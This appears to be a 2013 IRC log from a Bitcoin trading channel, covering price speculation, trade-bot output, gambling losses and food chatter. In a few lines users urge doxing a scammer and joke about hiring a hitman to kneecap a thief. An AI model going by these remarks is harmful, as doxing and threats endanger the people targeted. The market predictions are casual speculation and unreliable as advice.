mpex? Apr 20 00:38:23 you got 0 btc in mpex? Apr 20 00:38:29 0.6BTC on MPEX Apr 20 00:38:35 hahaha Apr 20 00:38:39 S.DICE looks like a good buy right now though Apr 20 00:38:53 why are you leaving bitcoinia land* Apr 20 00:38:56 ?* Apr 20 00:39:03 I was never leaving Apr 20 00:39:13 Just wanted to preserve capital on the crash Apr 20 00:39:17 just realizing your profits? Apr 20 00:39:19 and buy back lower Apr 20 00:39:26 which I did Apr 20 00:39:29 ah Apr 20 00:39:33 unfortunately I sold too... Apr 20 00:39:43 smickles kinda fucked me during thr crash Apr 20 00:39:49 But, has still been a pretty great week Apr 20 00:39:51 all started with those calls :( Apr 20 00:39:59 and i had written puts at 80 Apr 20 00:40:05 smickles needs to be available. Apr 20 00:40:08 mkopt those Apr 20 00:40:10 yea Apr 20 00:40:15 if he is holding your stuff Apr 20 00:40:24 he is too busy playing kerbal space program Apr 20 00:40:30 i dont wanna cause drama Apr 20 00:40:38 for like 5 coins Apr 20 00:40:45 i have a business to rub irl Apr 20 00:40:48 run* Apr 20 00:41:23 i could have made at least a grand on the crash though Apr 20 00:41:29 with that mad volatility Apr 20 00:41:38 yeah its been amazing Apr 20 00:41:54 bugpowder, what is you thoughts - kinda topping it seems. hard to tell Apr 20 00:42:03 i made about 50 bucks on .5 btc Apr 20 00:42:12 during the volatile cycles Apr 20 00:43:15 I don't know which way its going, asks have come up some, bids steady. Still a huge line for gox. perhaps a brief moment of relative stability this weekend? Apr 20 00:43:25 [MPEX] [S.MPOE] 16784 @ 0.0006932 = 11.6347 BTC [-] Apr 20 00:43:56 I am getting doubtful that we will see 30 though Apr 20 00:44:37 naw, I think the risk of that is gone Apr 20 00:44:49 need a major hack to kill confidence Apr 20 00:45:01 I forgot about that part in my previous analysis Apr 20 00:45:55 yeah, we already based this time and had a high volume day. So I think it is done for now - I guess 80 - 140 is possible but I can tell which one Apr 20 00:46:05 probably both :) Apr 20 00:46:19 yeah, just which one first Apr 20 00:46:43 this is definitely a time where I am very hesitant to sell for a loss, because it seems likely that gains will be available if I just wait long enough Apr 20 00:46:50 long enough being a few days Apr 20 00:47:07 ALthough I am in the green at spot prices Apr 20 00:47:14 just can't dump the stack Apr 20 00:47:51 Also I think I saw the big wall at 70 move to 95 Apr 20 00:48:23 hard to tell what people are going to do, the fear has subsided for now Apr 20 00:48:53 greed/fear indicator is nuetral Apr 20 00:48:58 spelling Apr 20 00:50:32 makes me cry Apr 20 00:50:40 i got 1500 at 51 and 52 Apr 20 00:50:45 and sold at 58 Apr 20 00:50:55 facepalmmmm Apr 20 00:50:58 oh, such a good buy Apr 20 00:51:04 and terrible sell Apr 20 00:51:45 I got back in at 75, so I missed the bottom Apr 20 00:52:00 bugpowder, they try! how many bitcoin service are in trouble right now ? Instawallet/bictoin central/bitflor/BTC-24/ massive ddos on MtGox Apr 20 00:52:09 yah Apr 20 00:52:20 this was also playing into my cynacism Apr 20 00:52:22 and Ozcoin got hacked and shut down Apr 20 00:52:24 same sheme pump pump crash hack Apr 20 00:52:42 gox is fine Apr 20 00:53:07 is but 5 major actor in a 2 week time frame ? Apr 20 00:54:15 ;;bids 50 Apr 20 00:54:17 There are currently 189638.01 bitcoins demanded at or over 50.0 USD, worth 14489944.2926 USD in total. | Data vintage: 0.0076 seconds Apr 20 01:00:00 I sold in the middle of the night when I got up to pee Apr 20 01:00:13 not my most clear headed moment Apr 20 01:00:35 I think we will see 175 again, thinking about it- lot of peoople will say whew, I got out Apr 20 01:00:36 I probably would have gotten shaken out at a much lower point anyway Apr 20 01:00:53 I've been in and out all the way up Apr 20 01:01:09 lol Apr 20 01:01:12 you are welcome mt gox Apr 20 01:01:53 http://www.youtube.com/watch?v=K2ku1A5Ox8U Apr 20 01:02:35 tiberiusiv, how do you conclude that there was a complete selling exhaustion ? Apr 20 01:02:44 pretty good signer Apr 20 01:03:06 [MPEX] [S.MPOE] 14853 @ 0.0006932 = 10.2961 BTC [-] Apr 20 01:03:57 hindsight is easy Apr 20 01:04:33 me too Apr 20 01:07:55 There are currently 27908.304 bitcoins demanded at or over 100.0 USD, worth 2991057.83822 USD in total. | Data vintage: 0.0074 seconds Apr 20 01:08:01 There are currently 63045.937 bitcoins offered at or under 200.0 USD, worth 9666032.41737 USD in total. | Data vintage: 6.9040 seconds Apr 20 01:08:28 There are currently 53948668 bitcoins demanded at or over 0.0 USD, worth 21112059.6406 USD in total. | Data vintage: 33.4907 seconds Apr 20 01:08:44 There are currently 110435.22 bitcoins offered at or under 1000.0 USD, worth 24493864.3627 USD in total. | Data vintage: 49.4595 seconds Apr 20 01:10:35 tiberiusiv: http://blockchained.com/depth_mtgox_15d.png Apr 20 01:12:11 [BTCTC] [ASICMINER-PT] 9 @ 1.314 = 11.826 BTC [+] Apr 20 01:12:54 yeah, you can only enter or exit positions without pain if you are banging up against a wall Apr 20 01:13:11 this is why they nearly always get eaten when touched, IMHO Apr 20 01:14:15 ;;bc,stats Apr 20 01:14:18 Current Blocks: 232164 | Current Difficulty: 8974296.01488785 | Next Difficulty At Block: 233855 | Next Difficulty In: 1691 blocks | Next Difficulty In About: 1 week, 5 days, 12 hours, 37 minutes, and 20 seconds | Next Difficulty Estimate: 9155437.91893 | Estimated Percent Change: 2.01845 Apr 20 01:17:04 [HAVELOCK] [SDICE] 2 @ 0.31 = 0.62 BTC [-] Apr 20 01:33:05 [MPEX] [S.MPOE] 497 @ 0.00069255 = 0.3442 BTC [-] Apr 20 01:33:08 [MPEX] [S.MPOE] 17400 @ 0.00069577 = 12.1064 BTC [+] Apr 20 01:33:19 [MPEX] [S.MPOE] 11403 @ 0.00070298 = 8.0161 BTC [+] Apr 20 01:43:09 tiberiusiv, your reasoning is quite clear and logic, but you need to assume that the volume high is due to selling Apr 20 01:44:10 could also be selling and buying and a quite unclear situation whether it goes down further Apr 20 01:44:31 wouldnt the order books spell it out for you a bit Apr 20 01:45:03 yes but that was not shown on the analyzed graph Apr 20 01:45:12 ic Apr 20 01:48:09 what they tell me at a quick glance is the price will move up until around 121-124 then fall to somewhere around 110-115 somewhere..pretty much same shiz...but thats my amateur ass analysis that might be backwards. Apr 20 01:49:01 ;;eightball am I right? Apr 20 01:49:01 Come again? Apr 20 01:49:05 sigh Apr 20 01:58:15 ;;seen tiberiusiv Apr 20 01:58:16 tiberiusiv was last seen in #bitcoin-assets 3 seconds ago: ignore everything else its irrelevant Apr 20 01:58:44 tiberiusiv how are you? Apr 20 01:59:04 lets make dis moolah baby Apr 20 01:59:47 that was a comment on your selling exhaustioin argument you said before Apr 20 01:59:47 did you make a bunch off the volatility recently? Apr 20 02:01:27 what is actually a good place to measure crows psychology? i mean here in irc are good discussioin channels but the number of people are not significant Apr 20 02:02:32 reddit Apr 20 02:02:34 lol Apr 20 02:02:35 jkjk Apr 20 02:03:20 that would be a good bot Apr 20 02:03:30 a bot that aggregates all crowd mania Apr 20 02:03:33 into an index Apr 20 02:03:35 but maybe its just a small subset of people pushing themself Apr 20 02:03:56 thestringpuller, shouldnt be that hard to code actually Apr 20 02:04:37 tiberiusiv: thats only if they are consumer buyers Apr 20 02:04:48 big players have a different field of view Apr 20 02:05:00 due to market depth restrictions Apr 20 02:06:13 yea but it survived Apr 20 02:06:16 somehow Apr 20 02:06:32 http://blockchained.com/depth_mtgox_15d.png Apr 20 02:06:44 who do they show the ask sum in kBTC in the lower chart? Apr 20 02:06:54 at 5.0 the price had very kittle volatility Apr 20 02:07:27 right now I think some entity is manipulating the market to induce volatility Apr 20 02:08:09 i bought a coin for 5 usd in march of 2012 and it stayrd that value for a long time Apr 20 02:08:18 no someone induces panic Apr 20 02:08:46 yea Apr 20 02:08:53 the 1% induced a panic sell Apr 20 02:09:01 via goxlag Apr 20 02:09:04 ;;goxlag Apr 20 02:09:14 why is it impossible? Apr 20 02:09:18 Error: Problem retrieving gox lag. Try again later. Apr 20 02:09:52 or a ddos Apr 20 02:10:00 no that wasnt my explanation Apr 20 02:10:20 yea at the end Apr 20 02:10:26 but someone started that exit a 1% Apr 20 02:10:41 after a well timed media blitz to up the price Apr 20 02:11:13 yea it happens bubbles go pop Apr 20 02:11:51 i have 1000 btc Apr 20 02:11:57 but smickles robbed me Apr 20 02:12:02 so there yo go Apr 20 02:12:27 why are you such a meanie! Apr 20 02:12:40 big meanie poopie head! Apr 20 02:13:41 also you dobt have any btc so what does it matter? Apr 20 02:13:56 why is your opinion any more real than mine? Apr 20 02:14:08 is your God better than my God too? Apr 20 02:14:16 can your dad beat up my dad? Apr 20 02:15:14 he probably can if he has 1000btc lol Apr 20 02:15:16 :D Apr 20 02:16:43 [19:11] i thought we agreed those that dont have 1000 btc arent allowed to form an opinion Apr 20 02:17:12 Okay, from now on, anyone who is not registered with a BTC address on OTC and signed in, with 1000 BTC on their OTC address Apr 20 02:17:21 Can zip their mouth then Apr 20 02:18:28 okay Namworld hush then Apr 20 02:18:44 jkjk Apr 20 02:19:19 http://www.youtube.com/watch?v=1z-AxgueBRk Apr 20 02:38:21 [MPEX] [S.MPOE] 13898 @ 0.00070298 = 9.77 BTC [+] Apr 20 02:45:34 thestringpuller> the 1% induced a panic sell Apr 20 02:45:38 that's a bs theory Apr 20 02:45:48 price went up to fast Apr 20 02:45:51 had to come down fast Apr 20 02:46:27 lag mabye helped it a long a bit... but I doubt it was the main cause Apr 20 02:47:07 nm tiberius already answerd it Apr 20 02:47:17 what is this dog? Apr 20 02:47:32 yes, hello this is dog Apr 20 02:47:47 ooo, great success! Apr 20 02:50:00 oh shit, not the 1% Apr 20 03:14:02 [A Apr 20 03:14:08 http://i.dailymail.co.uk/i/pix/2013/04/19/article-2311443-1962A4D3000005DC-986_964x711.jpg Apr 20 03:14:24 operating Apr 20 03:19:06 are these cats in bitcoin analysis bullshitting about going way down Apr 20 03:24:02 KRS1: how do you mean? Apr 20 03:25:05 sorry my bad Apr 20 04:29:37 [BTCTC] [COGNITIVE] 1 @ 0.175 BTC [-] Apr 20 04:34:05 [HAVELOCK] [HIM] 5 @ 1.75 = 8.75 BTC [-] **** BEGIN LOGGING AT Sat Apr 20 12:27:04 2013 Apr 20 12:27:14 http://trilema.com/2013/the-stuff-all-good-conspiracy-theories-start-with/ Apr 20 12:29:27 [BTCTC] [S.MPOE-PT] 1 @ 0.000699 BTC [+] Apr 20 12:36:03 mircea_popescu: hi Apr 20 12:36:39 [BTCTC] [ASICMINER-PT] 1 @ 1.186 BTC [+] Apr 20 12:36:46 [BTCTC] [ASICMINER-PT] 1 @ 1.1811 BTC [-] Apr 20 12:36:49 [BTCTC] [ASICMINER-PT] 1 @ 1.181 BTC [-] Apr 20 12:36:52 [BTCTC] [ASICMINER-PT] 1 @ 1.18 BTC [-] Apr 20 12:36:55 [BTCTC] [ASICMINER-PT] 1 @ 1.17 BTC [-] Apr 20 12:36:57 [BTCTC] [ASICMINER-PT] 1 @ 1.16 BTC [-] Apr 20 12:37:00 [BTCTC] [ASICMINER-PT] 1 @ 1.15 BTC [-] Apr 20 12:37:02 [BTCTC] [ASICMINER-PT] 1 @ 1.12 BTC [-] Apr 20 12:37:06 [BTCTC] [ASICMINER-PT] 1 @ 1.11 BTC [-] Apr 20 12:37:14 [BTCTC] [ASICMINER-PT] 1 @ 1.102 BTC [-] Apr 20 12:37:17 [BTCTC] [ASICMINER-PT] 1 @ 1.1 BTC [-] Apr 20 12:39:30 MJR__ heya Apr 20 12:40:05 kakobrekla this chanel is so quiet now. you broke it. Apr 20 12:40:47 lol, yeah Apr 20 12:51:38 [MPEX] [S.MPOE] 6100 @ 0.00068687 = 4.1899 BTC [+] Apr 20 12:54:59 its been very dead, kinda crazy Apr 20 12:55:13 AM sell off Apr 20 12:57:42 mornin Apr 20 12:57:57 good morning Apr 20 12:58:13 sup Apr 20 12:58:28 you guys up alrady ? :) Apr 20 12:58:33 already Apr 20 12:58:50 yep Apr 20 12:58:57 coffee in the restaurant Apr 20 12:59:07 aha! Apr 20 12:59:12 ill join you Apr 20 12:59:29 perfect, thinking of taking a bike ride Apr 20 13:00:20 o, wait Apr 20 13:00:25 whats the time 1 or 2 Apr 20 13:00:38 its 1 Apr 20 13:00:51 ? Apr 20 13:00:53 fuckin great! Apr 20 13:00:57 i thought it was 2 Apr 20 13:01:12 yep, extra hour, didnt get back till 6am Apr 20 13:01:12 (the tv says its 2) Apr 20 13:01:15 ah Apr 20 13:03:41 looks like we won the bet 420 Apr 20 13:03:52 is it 420$? Apr 20 13:07:04 yeah Apr 20 13:07:13 the $420 bet Apr 20 13:07:16 for the no side Apr 20 13:07:31 i lack context, what was the bet? Apr 20 13:08:14 by 4/20, btc reaches $420 Apr 20 13:08:46 I had some delicious shit today Apr 20 13:08:46 oh lol Apr 20 13:08:53 you ate shit? Apr 20 13:09:11 http://www.urbanspoon.com/rph/14/180621/1308000/vancouver-finch-s-tea-coffee-house-finch-s-tea-coffee-house-photo?page=1 Apr 20 13:10:00 Blue brie, sliced pear, prosciutto, roasted walnuts baguette, then coffee and the best damn chocolate chip cookie i've ever had Apr 20 13:11:20 cool Apr 20 13:11:22 i had nachos Apr 20 13:11:32 and then had japadog, and some of the finest gelatos around Apr 20 13:11:37 im such a hedonist Apr 20 13:11:37 lol Apr 20 13:14:16 i thought it was 2 << shut up and starve :D Apr 20 13:14:32 bowjob: there's still 18 hours left!! Apr 20 13:14:56 oh. Apr 20 13:15:01 I am planning to put up a name and shame page of all dishonest bitcoin.de traders Apr 20 13:15:05 well, i doubt it will hit $420 anyay Apr 20 13:15:18 ;;ticker Apr 20 13:15:19 BTCUSD ticker | Best bid: 119.50000, Best ask: 119.86999, Bid-ask spread: 0.36999, Last trade: 119.50000, 24 hour volume: 94912.78998995, 24 hour low: 110.45000, 24 hour high: 124.29998, 24 hour vwap: 117.75519 Apr 20 13:15:19 I lost over 10K because of these bastards Apr 20 13:15:22 heh Apr 20 13:16:09 some noob is now complaining he's about to lose coins because he sneaked in a bet with low weight Apr 20 13:16:10 anyone support me on this? Apr 20 13:16:10 lol Apr 20 13:16:40 damien. this reminds me of this kid who crossed me out of 3 btc Apr 20 13:17:01 not just me, but a mod a btctalk as well. he's gonna get doxed Apr 20 13:17:09 maybe you should do the same Apr 20 13:17:34 I'm speaking of reasonably high volume trades Apr 20 13:18:40 well, when btc hits 10k ea Apr 20 13:18:43 you wont feel to good Apr 20 13:20:01 I have trades of 40, 30, 50, 20, etc. all not paying up Apr 20 13:20:10 silver members Apr 20 13:20:21 already fantasizing hiring a hitman to cap the theif's knees Apr 20 13:21:54 cherry picking bastards Apr 20 13:22:48 lol Apr 20 13:24:30 thats 16k you lost Apr 20 13:24:36 well, you know what to do. play S.Dice Apr 20 13:24:39 >_> Apr 20 13:25:34 watup Apr 20 13:25:58 damientrog you should. Apr 20 13:26:39 i just found out an avalon 2 sold for 50k Apr 20 13:26:41 for a pre order Apr 20 13:26:47 yeezus. Apr 20 13:27:32 well, they would have been killed by the rally Apr 20 13:27:41 but then again its recent. so the buyer must be bullish Apr 20 13:28:54 my feet are killing me Apr 20 13:28:54 :/ Apr 20 13:29:01 bowjob 50k where? Apr 20 13:29:08 I spent around 4 hours walking around stanley parl Apr 20 13:29:11 park Apr 20 13:29:31 http://www.ebay.com/itm/ws/eBayISAPI.dll?ViewItem&item=321106241910 Apr 20 13:29:44 ate out, at 3 different establishments Apr 20 13:30:02 explored downtown vanouver. walked my way to stanley park Apr 20 13:30:18 ive probably walked 6 hours worth in aggregate time today Apr 20 13:30:27 i have the very first bfl order... i wonder if that would get close to that on ebay... Apr 20 13:31:17 I've had this Apr 20 13:31:18 http://s3-media3.ak.yelpcdn.com/bphoto/j5nWIkValLXxPKFhJKRumA/l.jpg Apr 20 13:31:55 and this Apr 20 13:31:56 im not sure where the other chaang is Apr 20 13:31:56 http://loop48.com/bump/wp-content/uploads/2009/06/japadogmenu20091206.jpg Apr 20 13:32:29 and this Apr 20 13:32:30 http://s3-media3.ak.yelpcdn.com/bphoto/AG6_uYZwJy89rbbDExkvmQ/l.jpg Apr 20 13:32:51 one of the finest gelato places in the world, probably Apr 20 13:33:03 the owner went to italy.. and beat the italians at their own game. lol. Apr 20 13:33:26 aye Apr 20 13:33:34 I always go there when i go to downtown Apr 20 13:33:51 then I bought 5 boxes of matcha pocky Apr 20 13:33:56 yeah its amazing here Apr 20 13:34:10 i only spent 70 Apr 20 13:34:49 and then yeah, stanley park. i heard people get quickies there Apr 20 13:35:02 its such a big park.. i dont doubt lol Apr 20 13:35:20 theres 2 effing lakes there in the park Apr 20 13:35:33 lots of hot chicks Apr 20 13:35:40 but idk, vancouver wimmenz Apr 20 13:35:47 they like louis vuitton, hermes, ect Apr 20 13:35:51 trendy people here Apr 20 13:35:52 lol Apr 20 13:36:04 okonomi is delicious Apr 20 13:36:06 So good Apr 20 13:36:12 The funny thing about japadog.. Apr 20 13:36:18 is it's a canadian invention Apr 20 13:36:22 not a japanese one Apr 20 13:36:59 the guy who made it was japanese, he wanted to make hotdogs witha twist Apr 20 13:37:09 so he put some seaweed Apr 20 13:37:14 then it went viral here Apr 20 13:37:47 thats an old ad btw, the prices have gone up Apr 20 13:38:15 and they have this new avocado hotdog.. its bratwurst hotdog with onions and avocados with an aburi twist Apr 20 13:38:25 they use a blowtorch to sear the avocado.. Apr 20 13:38:52 its only available during the early hours, since they only serve 10 of those htodogs Apr 20 13:39:07 apparently making them is a hassle Apr 20 13:39:22 aye. Apr 20 13:39:23 yeah that is the one id get Apr 20 13:39:40 i settled for okonomi. it was super yummy Apr 20 13:39:57 yeah Apr 20 13:39:57 lol Apr 20 13:40:09 vancouver's food scene is amazing Apr 20 13:40:32 but its really expensive here too Apr 20 13:40:50 aye Apr 20 13:40:53 bitcoin and all Apr 20 13:41:22 nah, im pretty chill with spending usually Apr 20 13:41:33 but i do have a weakness for food Apr 20 13:45:12 back in 2010 olympics, i heard of reports of up to 3 hrs lineup Apr 20 13:45:14 for japadog Apr 20 13:45:36 lemme find the vid Apr 20 13:46:28 http://www.youtube.com/watch?v=3CuiGMoQ3J0 Apr 20 13:46:33 Fn' hilarious Apr 20 13:46:39 I get my japadogs in under 10 minutes Apr 20 13:46:47 remember they have to cook them individually Apr 20 13:46:57 from that one effing cart Apr 20 13:48:20 Heck, even this guy tried em. http://farm7.static.flickr.com/6037/6246105337_f5ee9b09b3_z.jpg Apr 20 13:49:26 aye Apr 20 13:50:05 that place only accepts cash Apr 20 13:50:11 the carts at least Apr 20 13:53:36 i know a restaurant in van that can burn about 5 btc for 2 people Apr 20 13:53:48 i wont even dare to go there lol Apr 20 13:54:55 or at least not yet Apr 20 13:55:08 depeding on the btc price lol Apr 20 13:57:03 you soon will be, honestly Apr 20 13:58:24 aye. im actually relatively low maintenance, i dont require much.. cept food Apr 20 13:58:35 its much cheaper than say, owning cars, ect Apr 20 13:59:26 its a nightmare to drive around downtown vancouver anyway Apr 20 13:59:27 lol Apr 20 13:59:38 i saw a lambo today. poor lambo couldnt breath Apr 20 13:59:48 she couldn't speed because traffic everywhere Apr 20 13:59:59 i want one Apr 20 14:00:07 anyone know the qeueu at gox? Apr 20 14:00:08 aventador eh Apr 20 14:00:15 <9000 Apr 20 14:00:21 id like to know the queue as well Apr 20 14:00:26 >9000 Apr 20 14:00:29 under 9k hmm Apr 20 14:00:29 nice! aventador is bad ass Apr 20 14:00:36 its over 9000 Apr 20 14:00:38 ya Apr 20 14:00:40 a failed one Apr 20 14:00:44 ;;bids Apr 20 14:00:44 (bids [--under] ) -- Calculate the amount of bitcoin demanded at or over . If '--under' option is given, find coins or at or under . Apr 20 14:00:51 ;;bids 0 Apr 20 14:00:54 There are currently 53939937 bitcoins demanded at or over 0.0 USD, worth 21012027.8589 USD in total. | Data vintage: 0.0119 seconds Apr 20 14:00:55 well, it may as well be >9000 Apr 20 14:01:42 ahh over 9k Apr 20 14:01:46 id like to know how much over Apr 20 14:02:41 9350? Apr 20 14:03:21 i got it but the less than i was like wtf and just assumed not a joke:) Apr 20 14:09:44 [BTCTC] [B.YABMC] 1 @ 0.01497 BTC [+] Apr 20 14:09:51 [BTCTC] [B.YABMC] 98 @ 0.01498 = 1.468 BTC [+] Apr 20 14:09:56 [MPEX] [S.MPOE] 1427 @ 0.00068591 = 0.9788 BTC [-] Apr 20 14:10:18 ooh i love that stuff Apr 20 14:10:18 Lol just eat the choc Apr 20 14:10:30 i actually took some cooking courses Apr 20 14:10:33 “I'm an anaphylactic polar bear with a bunny rabbit shoved up my ass.” Apr 20 14:10:40 i learned mostly jack shit. Apr 20 14:10:40 [BTCTC] [PAJKA.BOND] 1 @ 0.1009 BTC [+] Apr 20 14:10:48 [BTCTC] [PAJKA.BOND] 12 @ 0.10174 = 1.2209 BTC [+] Apr 20 14:10:56 I do know how to cut cucumbers and slice stuff without slicing my fingers though Apr 20 14:11:16 and I can break eggs with one hand Apr 20 14:11:22 k, not that impressive but lol Apr 20 14:12:03 [BTCTC] [LTC-MINING] 5 @ 0.3459 = 1.7295 BTC [+] Apr 20 14:12:07 [BTCTC] [LTC-MINING] 2 @ 0.345979 = 0.692 BTC [+] Apr 20 14:12:12 oddly enough, the 'funnest' job was to clean the dishes. the water was warm, ect Apr 20 14:12:23 nah, it was more like a slave course Apr 20 14:12:35 I'm a multi, multi, multi-millionaire. I'm an American entrepreneur. The irony right now is that I feel like an anaphylactic polar bear with a bunny rabbit shoved up his ass. I'm not gonna explain it to you. It's just that thing, money, money, money, money. Everybody's trying to get to that bunny rabbit. Apr 20 14:12:38 a labour intensive course Apr 20 14:13:28 [BTCTC] [COGNITIVE] 9 @ 0.1975 = 1.7775 BTC [+] Apr 20 14:14:04 truffles was a quote from a movie Apr 20 14:14:13 i spit my beer out when i hear it Apr 20 14:14:17 heard Apr 20 14:14:29 go cognitive! why so high now? Apr 20 14:14:39 must be the faith in bfl Apr 20 14:15:09 [BTCTC] [B.YABMC] 10 @ 0.01498 = 0.1498 BTC [+] Apr 20 14:15:12 eveidently Apr 20 14:15:15 from the movie middle men Apr 20 14:15:25 russian mafia is trying to get their money Apr 20 14:15:56 its about the first time credit cards were used on the internet Apr 20 14:16:08 its a lot like where we qare with btc but 2 years ago Apr 20 14:16:10 its a good movie Apr 20 14:16:28 i partly got into btc cuz this fucker when he made this movie visa cut off his banking shit Apr 20 14:16:41 so some of my money is in some fucking island bank that they wont release Apr 20 14:16:46 btc.. muhahaha Apr 20 14:16:53 fuck visa/paypal and all the others Apr 20 14:17:57 well knowing and having the faith/vision not the same Apr 20 14:18:14 yes you can buy a jeep at a dealership Apr 20 14:18:22 or a guy just sold a porsche Apr 20 14:18:29 i learned about bitcoin in 2011, i thought it was a stupid idea Apr 20 14:18:33 is your God a sky god? Apr 20 14:18:41 when it was 12 dollars, all the runup to 31 Apr 20 14:18:52 i told my boss when it hit 31, seemed mildly interested Apr 20 14:18:55 then it crashed Apr 20 14:18:55 when i first learned about it i did not think it would take off, but loved the idea, so i delayted Apr 20 14:19:01 and i stfu'd lol Apr 20 14:19:27 shit was that 2 years ago? Apr 20 14:19:32 that crash damn Apr 20 14:19:38 yeah Apr 20 14:19:42 i thought bitcoin was done for Apr 20 14:19:42 seems like months ago Apr 20 14:19:48 ive largely ignored bitcoin in 2012 Apr 20 14:19:55 i saw it went from 2, to 5, then to 8 Apr 20 14:20:04 by ten bucks i knew it was onto something Apr 20 14:20:10 i got in at 12.75 Apr 20 14:20:11 lol Apr 20 14:20:32 im a miner, i never bought a btc Apr 20 14:20:37 i told my friends about it, they thought i was insane Apr 20 14:20:41 maybe i am.. hehe Apr 20 14:21:01 yeah i had like all these computers making this imaginary money, yeah i got loled at lots Apr 20 14:21:04 chang, u in asic Apr 20 14:21:25 bowjob i have the first bfl order and im a big asicminer holder Apr 20 14:21:31 and i hold cognitive stock, about 5% Apr 20 14:21:39 so yes but not directly Apr 20 14:21:43 right now i dont mine at all Apr 20 14:21:44 gj on the asic miner Apr 20 14:22:03 thanks, i just liked friedcat, i trusted him, had no idea about his project Apr 20 14:22:07 thank fuck i bought in Apr 20 14:22:18 i just went for avalon 2, had no idea what i was doing Apr 20 14:22:27 nore have i ever mined before Apr 20 14:22:42 i have enough faith in myself to read instructions on how to mine, lol Apr 20 14:23:28 im too lazy now to fuck with it Apr 20 14:23:30 well, they did Apr 20 14:23:38 i wasnt sure about avalon 2 Apr 20 14:23:59 i thought to myself, i gambled hundreds of btc at dice, whats 56 BTC for an avalon Apr 20 14:24:14 :) Apr 20 14:24:19 ive wisened up and switched to owning satoshi dice shares instead Apr 20 14:24:22 and got out before the crash Apr 20 14:24:23 lol Apr 20 14:24:32 i got out at .75 and .62 Apr 20 14:24:53 i saw shit going downhill from there, since people wont bet as much with higher btc point Apr 20 14:24:56 i never touched it, thought it was a bad idea Apr 20 14:25:07 i saw it trade at something like .0012 or something Apr 20 14:25:18 i didnt buy the "new users would make up for less volume crap" Apr 20 14:25:40 voorhees argued that people would feel "wealthy, and more inclined to bet" Apr 20 14:26:01 i didnt buy it, no matter how nice he was lol. it was risky for me, but it paid off Apr 20 14:26:14 .75 bitcoins for 100 shares Apr 20 14:26:16 i was at havelock Apr 20 14:26:51 though dice is doing fine this month apparently Apr 20 14:26:56 volume is kinda flat tho Apr 20 14:27:46 chang, type satoshidice.com Apr 20 14:27:49 yes Apr 20 14:28:06 i used to play dice to win money.. i had 78 bitcoins, ended up with 287 Apr 20 14:28:12 only to lose it all and go into red Apr 20 14:28:14 >_> Apr 20 14:28:17 my stupidity Apr 20 14:29:19 I was convinced that I found a "flaw" in the system, in the form a skewed probability for me, the binimial distribution wasnt adding up Apr 20 14:29:25 (binomial Apr 20 14:29:31 bowjob let me realy heartfelt thanks from shareholders Apr 20 14:29:38 to you Apr 20 14:29:39 but looking back now, the sample size was not enough Apr 20 14:29:44 Aye, np Apr 20 14:29:51 I got em back from the shares Apr 20 14:29:56 so i played double agen Apr 20 14:29:56 t Apr 20 14:29:57 lol Apr 20 14:30:39 I learned not to touch taht shit anymore. in a way, ive become wise Apr 20 14:30:40 :P Apr 20 14:31:04 http://www.reddit.com/r/IAmA/comments/1ch7wb/starting_with_almost_nothing_i_made_almost_500000/ Apr 20 14:31:08 Try this guy. Lost 500k Apr 20 14:31:26 This guy is royally buttfucked Apr 20 14:31:37 I mean, I felt it too... but not to this extent Apr 20 14:31:58 At the time, I only had 10k in fiat, i went. wtf am i doing Apr 20 14:32:16 its easy to use btc cuz its not like real money Apr 20 14:32:19 but yeah, 500k. and he's a math student.. out of all Apr 20 14:32:22 chang, exactly. Apr 20 14:32:26 100% on point. Apr 20 14:32:26 its why in vegas they give you chips Apr 20 14:32:38 I was dealing $500 per gamble on satoshi 73 Apr 20 14:32:44 getting high on gambling Apr 20 14:32:53 I was like, heh 40 bitcoins Apr 20 14:32:53 lol Apr 20 14:33:06 It did not feel real Apr 20 14:33:46 i found myself becoming extremely aggressive after losing a small bet Apr 20 14:33:58 like, for example, i bet btc, ect, then lost. Apr 20 14:34:02 I'd bet 5 btc Apr 20 14:34:13 a string of losses was catastrophic for me Apr 20 14:35:21 yes, me too. I left scared Apr 20 14:35:29 and knowing full well about gamblers fallacy.. back in jan, i wanted 1 btc to lose at 73% so i could bet 40 BTC next Apr 20 14:35:48 I thought, heh. the odds of .73 losing twice in a row is so small. what the hell Apr 20 14:36:00 i knew it was faulty logic.. but it wasnt my brain dealing Apr 20 14:36:00 omg Apr 20 14:36:53 i know full well that the past events doesn't influence future events for dice Apr 20 14:37:08 it doesn't feel like that though :) Apr 20 14:37:08 a fool and his money... Apr 20 14:37:25 but.. idk, it was extremely insidious(sp?) Apr 20 14:37:30 but I account for gambling under entertainment expense Apr 20 14:37:57 that's the correct attitude Apr 20 14:38:33 until u dont overstep the budget Apr 20 14:38:59 its easy to say, but i've been through that hell, and i've recovered. Apr 20 14:39:06 im not going back to that shit again Apr 20 14:39:07 lol Apr 20 14:39:33 i do admit that i was depressed for a month Apr 20 14:40:11 [MPEX] [S.MPOE] 10123 @ 0.00068529 = 6.9372 BTC [-] Apr 20 14:40:13 [MPEX] [S.MPOE] 8300 @ 0.00068687 = 5.701 BTC [+] Apr 20 14:40:23 [MPEX] [S.MPOE] 21061 @ 0.00068725 = 14.4742 BTC [+] Apr 20 14:40:25 [MPEX] [S.MPOE] 4400 @ 0.00068791 = 3.0268 BTC [+] Apr 20 14:40:26 [MPEX] [S.MPOE] 14587 @ 0.00069242 = 10.1003 BTC [+] Apr 20 14:41:22 you read his 500k story? Apr 20 14:41:32 he hasn't told his fiancee yet Apr 20 14:41:51 he's gonna get dumped, kicked out from school, and be in 50k in the red Apr 20 14:43:19 it was depressing Apr 20 14:45:19 "TIL to only bet on black. " Apr 20 14:45:25 Damn, reddit Apr 20 14:51:49 http://pastebin.com/tbBNsD9G Apr 20 14:51:54 A moment of silence please.. Apr 20 14:59:01 I wanted to tell him about satoshi less than 1.. just to see how fate would fuck with him Apr 20 14:59:09 and have him lose 6400 on bitzino again Apr 20 15:03:15 tyme for me to fap then pass out Apr 20 15:04:42 its 5 am, im a vampire Apr 20 15:20:05 are there any cases of fraud known from in intrsng ? Apr 20 15:20:45 or rock? Apr 20 15:24:01 [HAVELOCK] [SDICE] 2 @ 0.275 = 0.55 BTC [-] Apr 20 15:24:13 [BTCTC] [ASICMINER-PT] 1 @ 1.2 BTC [+] Apr 20 15:36:58 [BTCTC] [ASICMINER-PT] 3 @ 1.244 = 3.732 BTC [+] Apr 20 15:37:02 [BTCTC] [ASICMINER-PT] 1 @ 1.24879 BTC [+] Apr 20 15:37:06 [BTCTC] [ASICMINER-PT] 2 @ 1.2488 = 2.4976 BTC [+] Apr 20 15:37:15 [BTCTC] [ASICMINER-PT] 2 @ 1.249 = 2.498 BTC [+] Apr 20 15:43:32 